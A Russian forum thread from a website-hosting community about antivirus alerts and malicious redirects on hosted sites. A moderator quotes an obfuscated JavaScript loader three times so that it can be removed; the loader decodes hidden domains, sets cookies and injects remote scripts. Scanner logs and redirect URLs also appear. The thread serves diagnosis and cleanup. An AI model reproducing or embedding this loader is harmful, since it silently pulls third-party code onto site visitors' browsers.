Чат сообщества
   | |
| Модератор форума: Yuri_G |
| Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика) |
| Вирусы на сайтах |
|
Как предотвратить попадание вредоносных ссылок на сайт
Диагностика
Правила подачи заявки на диагностику и поиск вредоносного кода на сайте
Полезные ссылки: Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:
|
|
Цитата RONALDINHO08 (  ) В адресной строке браузера указано, что подключение не защищено Установите SSL-сертификат на сайт. https://www.ucoz.ru/help/security/zachem-nuzhen-ssl https://www.ucoz.ru/help/domains/podklyuchenie-ssl-sertifikata |
|
Модератор форума, http://schooltaraskovo.ucoz.ru/ сайт часто блокируется на разных компьютерах и разным ПО (в основном антивирусами). Но мы являемся школой и нам нужно чтобы доступ был безпроблемным (в частности наш сайт просматривают в Министерстве и когда не могут зайти, мы получаем...) как можно сделать так, что бы антивирус не реагировал на сайт???? (только на русском языке пожалуйста, т.к. администратор данного сайта владеет терминологией разработчиков сайтов на очень и очень низком уровне)
|
|
|
|
school_taraskovo, панель управления - дизайн - управление дизайном - глобальные блоки - второй контейнер - из блока сетевой город образование удалить следующий код
Код <script>window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="19557",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("schooltaraskovo.ucoz.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();</script><iframe id="a1996667054" style="display: none;"></iframe><div><font size="2"><sub><a href="http://trudvsem.ru/"><img src="http://trudvsem.ru/assets/img/header-text_2x.png" alt="Работа в России" style="font-size: 10pt;" width="200px"></a></sub></font></div><div><font size="2"><br></font></div><div><br></div> <script>window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="19557",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("schooltaraskovo.ucoz.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();</script><iframe id="a1996667054" style="display: none;"></iframe></div> <script>window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="19557",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("schooltaraskovo.ucoz.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();</script><iframe id="a1996667054" style="display: none;"></iframe> |
|
сайт http://seatrophy.do.am уже год или два как редиректит на порники и подобное
причом делает хитро ..редиректит только при заходе с ип нового .. на старый ип который уже редиректил не реагирует помогите почистить |
|
pasific, с каких страниц редиректит? под гостем или при авторизации? и главное куда. скопируйте ссылку посадки
|
|
Цитата webanet ( ) с каких страниц редиректит? под гостем или при авторизации? и главное куда. скопируйте ссылку посадки с главной редиректит и под гостем и под логином под любыми бразуерами и под любыми операционками с машин где 100% все чисто ссылка посадки это что ? туда куда перебрасывает ? с главной при попытке кликнуть за ссылку которая ведеть на страницу на самом сайте или на форуме сайта радномно перебрасывает на левые сайты в основном порники или поисковик или то что маскируется под поисковик bing.com перебрасывает как под гостем так и под залогиненым админом видел сайты на укозе где точно такое же поведение редиректа как и у меня но уже не припомню какие именно лог скана одного из веб антивирусов (забыл уже какакой) abnl/?adsdata=02Q%21vExYsaICLfQjh%5ED0dfnU207lX7d;sNLKUAUcMsEffgWA402%5EjPa1zAL7yMsjaxSQ3VBXTPGqEVRydB22kYICgddXyC49GDFI%21KSR1P3ygWQ%5EtvlK7IcSjOYHLecdfINIO6%21T7vJuWKIyp%211fWzRvLlKT0K%21rxc4vhOOX;X;1%215XakHf4cTjWB%5EFjDWB9YknyUxCUEyTzUV1LfYc7LGjK Severity: Malicious Reason: Detected reference to blacklisted domain Details: Detected reference to malicious blacklisted domain rot.spotsniper.ru File size[byte]: 24325 File type: ASCII Page/File MD5: 605B723235DA820C8182AD9F944F6661 Scan duration[sec]: 0.149 /abnl/?adsdata=a5313MLp18wQZ7ScZUqxfLbYQmm3HDIaPHHqJ2VyiCtRDzO0CJa4Wwz54nk75MgEZyDiBOsBUzLlpOYYcrV4QOZGDbkMJ7%5EwMxke84a%21bpVdcx%5EEzZ5GbVPxGa19dgpT0GNXyLv4MDESNrrPDOJ2Py0dPMmVHi0IkRBJe3TuXakD6d%21a658CsDywxZ81mE9sTr0IEv%5E;40%21H;fi%21qD52Zwoo Severity: Malicious Reason: Detected reference to blacklisted domain Details: Detected reference to malicious blacklisted domain rot.spotsniper.ru File size[byte]: 24321 File type: ASCII Page/File MD5: CFCE4BC001F7CDDFC29E851988537783 Scan duration[sec]: 0.137 /abnl/?adsdata=XJvi1xe81Lrjy27KkS88Uh4tIdsP065Eaca0XH5yrDAItfYXRYrwBgkTTxYLllgfw4wGsxWiLcgMbYz4%5E3LpkKq;nXUsjeBgivRFA5gmh94qxyAsQAyqC8xud4ep2hR2HglvIbU9wMAQsAzd9bryilBFEniVi3F%5E%21ssixPZTGnxbQIQ%5EGBbbud%5EcKCwgfNuspaq4lqIkhc5q9SdwFjUL;Yhv Severity: Malicious Reason: Detected reference to blacklisted domain Details: Detected reference to malicious blacklisted domain rot.spotsniper.ru File size[byte]: 24320 File type: ASCII Page/File MD5: A928019C1FE842A10D49CC5F9D7DD88A Scan duration[sec]: 0.134 /abnl/?adsdata=eIumSQ55AeOEDPp99YfHRr8bHx1PkGtFWl%5EHA%21rJ7HjuyMMdzsEkr9pVGiP7%21v%21799alRjZ;4QmAgfE%215%5EBpqsDDQQPs9Q%21IPPhzcdtJ;8dlVvz;X0dJ%21xegbXd%21sQZ3CDTq7SVixKu383tnpMRa3NgYZkIuGR0Xb5iib%21AwZcz4ua26gcsW7u%5EOF9gJ25X8p00bB2ZZ9eQs5KLgJzaVSUoo Severity: Malicious Reason: Detected reference to blacklisted domain Details: Detected reference to malicious blacklisted domain rot.spotsniper.ru File size[byte]: 24326 File type: ASCII Page/File MD5: 8F11EE69569F7E0ED8CAADD2EA3EB9E5 Scan duration[sec]: 0.134 Сообщение отредактировал pasific - Среда, 23 Янв 2019, 22:47:10
|
|
pasific, мне не нужны ваши сканы. мне нужна только страница куда вас перебрасывает особенно если это порно или маскировка под бинг. как только вас перебросит копируйте ссылку и вставляйте сюда в сообщение
|
|
Цитата webanet ( ) мне нужна только страница куда вас перебрасывает особенно если это порно или маскировка под бинг. как только вас перебросит копируйте ссылку и вставляйте сюда в сообщение сейчас сюда редиректит стабильно .. но опять таки ..редирект хитрый не каждый заход а новый ип адресс ..но и старый ип не забувает и иногда и старый редиректит .. редиректит так же и при сёрфе на странице новости по новостям И/или просто срабатывает по тайм ауту где то через 3 минуты ..после захода на главную .. http://pilsdesktop.info/?rzi=1457945&rsz=1457945&rid= редирект этот явно или на фейковый антивирус или на вирус в любом случае на угрозу Добавлено (30 Янв 2019, 14:27:47) Добавлено (31 Янв 2019, 12:25:06) Сообщение отредактировал pasific - Вторник, 29 Янв 2019, 15:10:33
|
|
pasific, спасибо. больше не нужны посадочные страницы. это реклама системы отключается платно
|
|
Цитата webanet ( ) pasific, спасибо. больше не нужны посадочные страницы. это реклама системы отключается платноя я тоесть ваши рекламодатели это вирусописатели и порнобароны и накрутчики посещений ) ну класс ! я так и подозревал Сообщение отредактировал pasific - Пятница, 01 Фев 2019, 20:39:23
|
|
pasific, порно рекламу нужно сфотографировать на скрин. про вирусописателей не понятно. на сайт реагируют антивирусы?
|
|
Цитата webanet ( ) pasific, порно рекламу нужно сфотографировать на скрин. про вирусописателей не понятно. на сайт реагируют антивирусы? всем все ясно ... очень печяльно .. тему педалировать я дальше не буду... хотя мне кажется вы идете не правильным в плане долгосрочного бизнеса путем ... но на народ.ру такой фигни не было .да и можно был свой хтмл заливать .. тем не менее благодарен за бесплатый хостинг .. и более возмущятся не буду ..спасибо что посказали откуда все это .. |
|
Здравствуйте
При входе на сайт: http://shkola-i-my.ucoz.ru/ с пк с установленным каперским выдает ошибку: "Веб-адрес объекта: http://shkola-i-my.ucoz.ru/ содержит легальную программу, которая может быть использована злоумышленниками для нанесения вреда компьютеру или данным пользователя not-a-virus:HEUR:AdWare.Script.Generic" от компании касперского получил следующие рекомендации: "Вам необходимо удалить следующие скрипты с кода Вашего сайта: ... <script>window.a1336404323 = 1;!function(){var t=JSON.parse('["6b787568706b3 ... u,function(){},function(){t[i+1]&&d(i+1)})}};d(0);}();</script>" Рекомендации выполнил, сайт также недоступен. |
| |||